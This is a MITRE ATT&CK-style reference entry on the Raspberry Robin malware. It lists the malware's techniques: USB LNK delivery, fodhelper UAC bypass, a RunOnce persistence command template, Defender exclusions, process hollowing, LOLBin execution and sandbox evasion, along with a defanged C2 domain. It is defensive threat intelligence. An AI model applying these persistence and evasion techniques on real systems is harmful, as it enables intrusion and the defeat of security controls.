Raspberry Robin

Raspberry Robin is initial access malware first identified in September 2021, and active through early 2024. The malware is notable for spreading via infected USB devices containing a malicious LNK object that, on execution, retrieves remote hosted payloads for installation. Raspberry Robin has been widely used against various industries and geographies, and as a precursor to information stealer, ransomware, and other payloads such as SocGholish, Cobalt Strike, IcedID, and Bumblebee.[1][2][3] The DLL componenet in the Raspberry Robin infection chain is also referred to as "Roshtyak."[4] The name "Raspberry Robin" is used to refer to both the malware as well as the threat actor associated with its use, although the Raspberry Robin operators are also tracked as Storm-0856 by some vendors.[5]

ID: S1130
Type: MALWARE
Platforms: Windows
Contributors: Swachchhanda Shrawan Poudel
Version: 1.0
Created: 17 May 2024
Last Modified: 23 July 2024

Techniques Used

Domain ID Name Use
Enterprise T1548 Abuse Elevation Control Mechanism

Raspberry Robin implements a variation of the ucmDccwCOMMethod technique abusing the Windows AutoElevate backdoor to bypass UAC while elevating privileges.[1]

.002 Bypass User Account Control

Raspberry Robin will use the legitimate Windows utility fodhelper.exe to run processes at elevated privileges without requiring a User Account Control prompt.[2]

Enterprise T1583 .001 Acquire Infrastructure: Domains

Raspberry Robin uses newly-registered domains containing only a few characters for command and controll purposes, such as "v0[.]cx".[2]

.008 Acquire Infrastructure: Malvertising

Raspberry Robin variants have been delivered via malicious advertising items that, when interacted with, download a malicious archive file containing the initial payload, hosted on services such as Discord.[3]

Enterprise T1071 Application Layer Protocol

Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads.[2][1][3]

.001 Web Protocols

Raspberry Robin uses outbound HTTP requests containing victim information for retrieving second stage payloads.[2] Variants of Raspberry Robin can download archive files (such as 7-Zip files) via the victim web browser for second stage execution.[3]

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key such as: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce{random value name} = "rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s "{dropped copy path and file name}"".[1]

Enterprise T1059 Command and Scripting Interpreter

Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution.[3]

.003 Windows Command Shell

Raspberry Robin uses cmd.exe to read and execute a file stored on an infected USB device as part of initial installation.[2]

Enterprise T1622 Debugger Evasion

Raspberry Robin leverages anti-debugging mechanisms through the use of ThreadHideFromDebugger.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

Raspberry Robin contains several layers of obfuscation to hide malicious code from detection and analysis.[1]

Enterprise T1480 Execution Guardrails

Raspberry Robin will check for the presence of several security products on victim machines and will avoid UAC bypass mechanisms if they are identified.[1] Raspberry Robin can use specific cookie values in HTTP requests to command and control infrastructure to validate that requests for second stage payloads originate from the initial downloader script.[3]

Enterprise T1083 File and Directory Discovery

Raspberry Robin will check to see if the initial executing script is located on the user's Desktop as an anti-analysis check.[3]

Enterprise T1574 Hijack Execution Flow

Raspberry Robin will drop a copy of itself to a subfolder in %Program Data% or %Program Data%\Microsoft\ to attempt privilege elevation and defense evasion if not running in Session 0.[1]

.002 DLL Side-Loading

Raspberry Robin can use legitimate, signed EXE files paired with malicious DLL files to load and run malicious payloads while bypassing defenses.[3]

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Raspberry Robin can add an exception to Microsoft Defender that excludes the entire main drive from anti-malware scanning to evade detection.[3]

Enterprise T1070 .004 Indicator Removal: File Deletion

Raspberry Robin can delete its initial delivery script from disk during execution.[3]

.009 Indicator Removal: Clear Persistence

Raspberry Robin uses a RunOnce Registry key for persistence, where the key is removed after its use on reboot then re-added by the malware after it resumes execution.[5]

Enterprise T1105 Ingress Tool Transfer

Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's %AppData% folder.[3][2]

Enterprise T1559 Inter-Process Communication

Raspberry Robin contains an embedded custom Tor network client that communicates with the primary payload via shared process memory.[1]

.001 Component Object Model

Raspberry Robin creates an elevated COM object for CMLuaUtil and uses this to set a registry value that points to the malicious LNK file during execution.[1]

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

Raspberry Robin will execute its payload prior to initializing command and control traffic by impersonating one of several legitimate program names such as dllhost.exe, regsvr32.exe, or rundll32.exe.[1]

.008 Masquerading: Masquerade File Type

Raspberry Robin has historically been delivered via infected USB drives containing a malicious LNK object masquerading as a legitimate folder.[2]

Enterprise T1571 Non-Standard Port

Raspberry Robin will communicate via HTTP over port 8080 for command and control traffic.[2]

Enterprise T1027 Obfuscated Files or Information

Raspberry Robin uses mixed-case letters for filenames and commands to evade detection.[2]

.002 Software Packing

Raspberry Robin contains multiple payloads that are packed for defense evasion purposes and unpacked on runtime.[1]

Enterprise T1057 Process Discovery

Raspberry Robin can identify processes running on the victim machine, such as security software, during execution.[1][3]

Enterprise T1055 .012 Process Injection: Process Hollowing

Raspberry Robin will execute a legitimate process, then suspend it to inject code for a Tor client into the process, followed by resumption of the process to enable Tor client execution.[1]

Enterprise T1091 Replication Through Removable Media

Raspberry Robin has historically used infected USB media to spread to new victims.[1][2]

Enterprise T1518 .001 Software Discovery: Security Software Discovery

Raspberry Robin attempts to identify security software running on the victim machine, such as BitDefender, Avast, and Kaspersky.[1][3]

Enterprise T1218 .007 System Binary Proxy Execution: Msiexec

Raspberry Robin uses msiexec.exe for post-installation communication to command and control infrastructure.[2] Msiexec.exe is executed referencing a remote resource for second-stage payload retrieval and execution.[1]

.008 System Binary Proxy Execution: Odbcconf

Raspberry Robin uses the Windows utility odbcconf.exe to execute malicious commands, using the regsvr flag to execute DLLs and bypass application control mechanisms that are not monitoring for odbcconf.exe abuse.[2]

.010 System Binary Proxy Execution: Regsvr32

Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.[2]

.011 System Binary Proxy Execution: Rundll32

Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.[2]

Enterprise T1082 System Information Discovery

Raspberry Robin performs several system checks as part of anti-analysis mechanisms, including querying the operating system build number, processor vendor and type, video controller, and CPU temperature.[3]

Enterprise T1033 System Owner/User Discovery

Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to determine if it is running in Session 0, indicating running with elevated privileges.[1]

Enterprise T1204 User Execution

Raspberry Robin execution can rely on users directly interacting with malicious LNK files.[5]

Enterprise T1497 Virtualization/Sandbox Evasion

Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment.[1]

.001 System Checks

Raspberry Robin performs a variety of system environment checks to determine if it is running in a virtualized or sandboxed environment, such as querying CPU temperature information and network card MAC address information.[3]

Enterprise T1102 Web Service

Raspberry Robin second stage payloads can be hosted as RAR files, containing a malicious EXE and DLL, on Discord servers.[3]

Enterprise T1047 Windows Management Instrumentation

Raspberry Robin can execute via LNK containing a command to run a legitimate executable, such as wmic.exe, to download a malicious Windows Installer (MSI) package.[1]

References